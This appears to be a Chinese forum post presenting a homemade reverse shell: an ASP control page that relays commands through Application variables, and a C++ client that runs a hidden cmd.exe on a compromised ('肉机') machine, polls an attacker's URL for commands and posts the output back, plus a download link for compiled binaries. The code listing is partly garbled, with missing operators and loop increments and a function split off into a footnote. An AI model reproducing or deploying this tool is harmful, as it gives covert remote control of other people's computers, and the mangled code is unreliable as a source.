
用ASP实现反向连接控制


http://www.gipsky.com/
原理:用ASP实现反向连接,客户端shell.exe大小6K,控制端console.asp大小1.75K

详解:

灵感来源于入侵渗透内网时需要反向连接但没有公网IP的时候,想到ASP的Application对象功能之强大,所以产生以下想法

肉机执行程序shell.exe让cmd.exe与偶网站一ASP程序进行交互,实现控制

Application("output")为输出流,保存程序执行结果

Application("input")为输入流,保存要执行的命令

思路:

[Client] <--- [Control] <--- [Attacker]



Client上运行shell.exe,Control运行console.asp,Attacker通过访问console.asp控制Client

实例:

肉机A,运行"shell.exe cooldiyer.uni.cc /cmd.asp"

偶网站放上cmd.asp,URL路径为 http://cooldiyer.uni.cc/cmd.asp

这时我访问 http://cooldiyer.uni.cc/cmd.asp?who=master (参数一定要加上,标明身份)

就可以进行控制了,Refresh刷新可以看到已经有结果了,输入命令,点Execute执行,过几秒钟后,

点击Refresh按钮可以看到执行结果,点击Clear清空输入输出流,执行"exit"程序退出

声明:

只做技术交流,程序只做演示使用,只实现与cmd.exe交互的功能,转载或修改需保留版权



代码:

console.asp

____________________________________________________________________________

<%
' Purpose:
' Control page for the reverse shell: it brokers commands and output between
' the client program (shell.exe) and a browser. Two server-wide Application
' variables act as the streams: Application("input") holds the command waiting
' to be run, Application("output") accumulates the results.
'
' Request shapes handled below (all read via request(), so query string or
' form body both work):
'   act=login / act=exit   - sent by the client when it starts / stops
'   cmd=...                - queues a command (from the browser form)
'   result=...             - appends command output (from the client)
'   get=yes                - client polling; ends up in the final "else" branch
'   who=master             - marks a browser request; frame=1 renders the output pane
'
' NOTE(review): Application state is shared by every visitor of this page, and
' the cmd= branch checks neither "who" nor "login" - any request carrying a
' non-empty cmd overwrites the input stream.

' Client announces itself
if request("act") = "login" then
    application("login") = "yes"
    response.end
end if

' Client is leaving: reset the login flag and clear both streams
if request("act") = "exit" then
    application("login") = "no"
    application("input") = ""
    ' NOTE(review): key is spelled "outout" here, unlike "output" everywhere else.
    application("outout") = ""
    response.end
end if

' Browser view is refused until a client has logged in
if application("login") <> "yes" and request("who") = "master" then
    response.write "Client not connect.."
    response.end
end if

' A command was submitted: put it in the input stream for the client to pick up
if request("cmd") <> "" then
    application("input") = request("cmd")
end if

' Client reports a finished command: append its output, then empty the input stream
if request("result")<>"" then
    ' NOTE(review): an operator between the two operands appears to have been
    ' dropped by the forum filter (the page itself warns the listing may be mangled).
    application("output") = application("output") request("result")
    application("input") = ""
end if
%>

<% If request("frame")="1" Then %>

<%
' Clear button: empty both streams and reload the output pane
if request("act") = "clear" then
    Application("input") = ""
    Application("output") = ""
    response.redirect request.servervariables("script_name")&"?frame=1"
end if
%>
<textarea cols=120 rows=30>
<%=application("output")%>
</textarea>
<a href=# onclick="location.replace(location.href);">Refresh</a>
<a href=?frame=1&act=clear>Clear</a>
<% elseif request("who") = "master" then %>
<html>
<head><title>ASP Console Manager By cooldiyer</title></head>
<body>
<iframe src=<%=request.servervariables("script_name")%>?frame=1 width=900 height=500 frameborder=0></iframe><br>
<form method=post name=frm>
<input type=text size=50 name="cmd">
<input type=hidden name="who" value="master">
<input type=submit value="Execute">
</form>
<script>frm.cmd.focus();</script>
<%
' Any other request (in practice the client's get=yes poll): the response body
' is the pending command, or empty when there is none
else
    response.write application("input")
end if
%>

____________________________________________________________________________

// shell.cpp : Defines the entry point for the console application.

//

// 实现功能: 与ASP控制端实现交互,实现反向连接

//



#include "stdafx.h"

#include "shell.h"

#include "afxinet.h"



#ifdef _DEBUG

#define new DEBUG_NEW

#undef THIS_FILE

static char THIS_FILE[] = __FILE__;

#endif



#define BUFFER_SIZE 1024 // size of the pipe read buffer used by DoShell()

/////////////////////////////////////////////////////////////////////////////
// The one and only application object

CWinApp theApp;

using namespace std;

// Percent-encodes a C string for use in the form body (the definition below is
// garbled by the forum's markup filter; part of it appears as footnote 1 at the
// end of the page).
CString URLEncode(const char* s);
// POSTs szFormData to the control page; when szResult is non-NULL the response
// text is strcpy'd into it.
BOOL PostRequest(const char *szFormData, char *szResult);
// Spawns a hidden cmd.exe and relays between its pipes and the control page.
void DoShell();

// Shared globals: host and path of the control page, filled from argv in _tmain.
// NOTE(review): fixed 50-byte buffers that _tmain fills with strcpy() and no
// length check.
char szServer[50], szPath[50];



// Entry point: reads <Server> <Path> from the command line, sends act=login to
// the control page, runs the cmd.exe relay loop, then sends act=exit.
// Returns -1 on bad usage, otherwise nRetCode (1 if MFC initialisation failed -
// note that execution continues past that failure).
int _tmain(int argc, TCHAR* argv[], TCHAR* envp[])
{
    int nRetCode = 0;

    // initialize MFC and print and error on failure
    if (!AfxWinInit(::GetModuleHandle(NULL), NULL, ::GetCommandLine(), 0))
    {
        // TOD change error code to suit your needs
        // NOTE(review): nRetCode is set but there is no return here, so the
        // program keeps running without MFC initialised.
        cerr << _T("Fatal Error: MFC initialization failed") << endl;
        nRetCode = 1;
    }
    printf("ASP Console Client By CoolDiyer\n");
    if (argc == 3)
    {
        memset(szServer, 0, sizeof(szServer));
        memset(szPath, 0, sizeof(szPath));
        // NOTE(review): unbounded strcpy into the 50-byte globals; an argument
        // longer than that overruns them.
        strcpy(szServer, argv[1]);
        strcpy(szPath, argv[2]);
    }
    else
    {
        // NOTE(review): the `<a href=...>` fragment inside this string literal is
        // forum auto-linking residue from the web page, not part of the program.
        printf("Usage:\n\trshell <Server> <Path>\nExp.\n\trshell <a href="http://www.abc.com" target=_blank>www.abc.com</a> /x.asp\n");
        return -1;
    }
    char szResult[1024];
    PostRequest("act=login", szResult); // login: the control page sets its "login" flag
    DoShell(); // relay loop between cmd.exe and the control page
    PostRequest("act=exit", szResult); // logout: the control page resets its state
    return nRetCode;
}



//
// URL-encoding helper; returns the encoded text as a CString.
//
// NOTE(review): this listing is corrupted by the forum's markup filter. The
// condition after `if` was turned into footnote "[1]" (its text, together with
// the rest of this function and the first half of PostRequest, is printed under
// "附注" at the end of the page); `s<i>` appears to be a mangled array index and
// the for-loop increment has been dropped. Everything from the
// `while(pFile->ReadString` line down to `return TRUE;` belongs to
// PostRequest, not to URLEncode. Left exactly as printed.
//
CString URLEncode(const char* s)
{
    CString encoded = "";
    int len = strlen(s);
    char* buf = new char[16]; // way longer than needed
    unsigned char c;

    for(int i=0; i < len; i )
    {
        c = s<i>;
        if [1]
        {
            // --- from here on: tail of PostRequest (see note above) ---
            // Reads the HTTP response line by line; each line overwrites
            // szResult, so only the last line survives.
            while(pFile->ReadString(szData))
            {
                if (szResult != NULL)
                    strcpy(szResult, szData.GetBuffer(0)); // NOTE(review): unbounded copy into the caller's buffer
            }
            pFile->Close();
        }
        session.Close();
    }
    catch(...){
        // On any exception, jump back to `loop:` inside the try block while
        // uRetry is non-zero.
        if (uRetry --)
            goto loop;
    }
    return TRUE;
}



//
// Core routine: runs a hidden cmd.exe with its stdin/stdout/stderr redirected
// through two anonymous pipes and relays between those pipes and the control
// page. Output read from cmd.exe is URL-encoded and POSTed as "result=...";
// when no output is pending, the control page is polled with "get=yes" about
// once a second until it returns a non-empty command, which is then written
// (plus a newline) to cmd.exe's stdin. The literal command "exit" ends the loop.
//
// Observable behaviour: a child cmd.exe started with SW_HIDE and pipe std
// handles, plus a steady stream of small form POSTs to the configured URL.
//
// NOTE(review): the CreatePipe / CreateProcess / WriteFile return values are
// stored in `ret` but never checked; only the ReadFile result is acted on.
//
void DoShell()
{
    int ret;

    // Inheritable handles so the child can use the pipe ends.
    SECURITY_ATTRIBUTES sa;

    sa.nLength = sizeof( sa );
    sa.lpSecurityDescriptor = 0;
    sa.bInheritHandle = TRUE;

    // Pipe 1: cmd.exe stdout/stderr -> this process.
    // Pipe 2: this process -> cmd.exe stdin.
    HANDLE hReadPipe1, hWritePipe1, hReadPipe2, hWritePipe2;

    ret=CreatePipe(&hReadPipe1, &hWritePipe1, &sa, 0);
    ret=CreatePipe(&hReadPipe2, &hWritePipe2, &sa, 0);

    STARTUPINFO si;
    ZeroMemory(&si, sizeof(si));

    GetStartupInfo(&si);

    si.cb = sizeof(si);
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.wShowWindow = SW_HIDE; // no console window for the child
    si.hStdInput = hReadPipe2;
    si.hStdOutput = si.hStdError = hWritePipe1;

    PROCESS_INFORMATION processInfo;

    char cmdLine[] = "cmd.exe";

    ZeroMemory(&processInfo, sizeof(PROCESS_INFORMATION));
    // bInheritHandles = 1 so the child receives the pipe handles set in si.
    ret = CreateProcess(NULL, cmdLine, NULL, NULL, 1, 0, NULL, NULL, &si, &processInfo);

    char buff[BUFFER_SIZE] = { 0 }; // reused both for pipe output and for the polled command
    char szTmp[BUFFER_SIZE*3];      // larger because the result is URL-encoded (up to 3 chars per byte)
    unsigned long bytesRead = 0;
    int i = 0;

    while (TRUE)
    {
        memset(buff, 0, BUFFER_SIZE);
        // Non-blocking check for pending output from cmd.exe.
        ret = PeekNamedPipe(hReadPipe1, buff, BUFFER_SIZE, &bytesRead, 0, 0);

        // Intended to re-check up to five times at 100 ms intervals.
        // NOTE(review): the loop increment is missing as printed - the page
        // warns that the listing may have been mangled by the forum filter.
        for (i = 0; i < 5 && bytesRead == 0; i )
        {
            Sleep(100);
            ret = PeekNamedPipe(hReadPipe1, buff, BUFFER_SIZE, &bytesRead, NULL, NULL);
        }

        if (bytesRead)
        {
            // Drain what was peeked and ship it to the control page.
            // NOTE(review): if bytesRead == BUFFER_SIZE, buff has no NUL
            // terminator and the strlen/strcat below read past it.
            ret = ReadFile( hReadPipe1, buff, bytesRead, &bytesRead, 0 );
            if (!ret) break;
            memset(szTmp, 0, sizeof(szTmp));
            strcpy(szTmp, "result=");
            strcat(szTmp, URLEncode(buff).GetBuffer(0));
            printf("%s", szTmp);
            PostRequest(szTmp, NULL); // send the command output; the response is discarded
            printf("Post command result ok\n");
        }
        else
        {
            // No output pending: poll the control page for the next command
            // until the response is non-empty. buff receives the response text
            // through PostRequest's strcpy (no length check there).
            do
            {
                PostRequest("get=yes", buff);
                printf("get command\n");
                ::Sleep(1000); // poll interval: 1 s
            }
            while (strlen(buff) <= 0);
            printf("%s\n", buff);
            // The literal command "exit" stops the relay.
            if (strcmp(buff, "exit") == 0) break;

            strcat(buff, "\n"); // cmd.exe runs the line once it sees the newline
            bytesRead = strlen(buff);
            printf("execute command %s", buff);
            // Hand the command to cmd.exe's stdin.
            WriteFile( hWritePipe2, buff, bytesRead, &bytesRead, 0);
        }
    }

    // Kill cmd.exe outright; its exit is not waited on.
    // NOTE(review): processInfo.hProcess / hThread are never closed.
    TerminateProcess(processInfo.hProcess, 0);

    CloseHandle(hReadPipe1);
    CloseHandle(hReadPipe2);
    CloseHandle(hWritePipe1);
    CloseHandle(hWritePipe2);
}

____________________________________________________________________________

备注:

以上代码可能因过滤而显示错误,请下载压缩包(含全部源代码和编译好的程序): <a href="http://201314.free.fr/attachments/200612/aspconsole.zip" target=_blank>http://201314.free.fr/attachments/200612/aspconsole.zip</a>
附注(以下第1条似为正文中 `if [1]` 处被论坛脚注机制截走的代码片段,即 URLEncode 的后半部分与 PostRequest 的前半部分)
  1. c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z') ||

    (c >= '0' && c <= '9') || c == '.' || c == '-' || c == '_')

    {

    sprintf(buf, "%c", c);

    encoded = buf;

    continue;

    }

    if(c == ' ')

    {

    sprintf(buf, "%c", ' ');

    encoded = buf;

    continue;

    }

    sprintf(buf, "%.2X", c);

    encoded = "%";

    encoded = buf;

    }



    delete[] buf;

    return encoded;

    }



    //

    // 表单发送函数,核心例程,返回接收到的内容,也就是要执行的命令

    //



    BOOL PostRequest(const char *szFormData, char *szResult)

    {

    unsigned int uRetry = 3; //重试三次

    try{

    loop:

    CInternetSession session;

    CHttpConnection *pConnection = session.GetHttpConnection(szServer);

    CHttpFile *pFile = pConnection->OpenRequest(CHttpConnection::HTTP_VERB_POST, szPath);

    // AddRequestHeaders是必要的

    pFile->AddRequestHeaders("Content-Type: application/x-www-form-urlencoded");

    CString szData;



    if (pFile -> SendRequest(NULL,0,(LPVOID) szFormData, strlen(szFormData) 1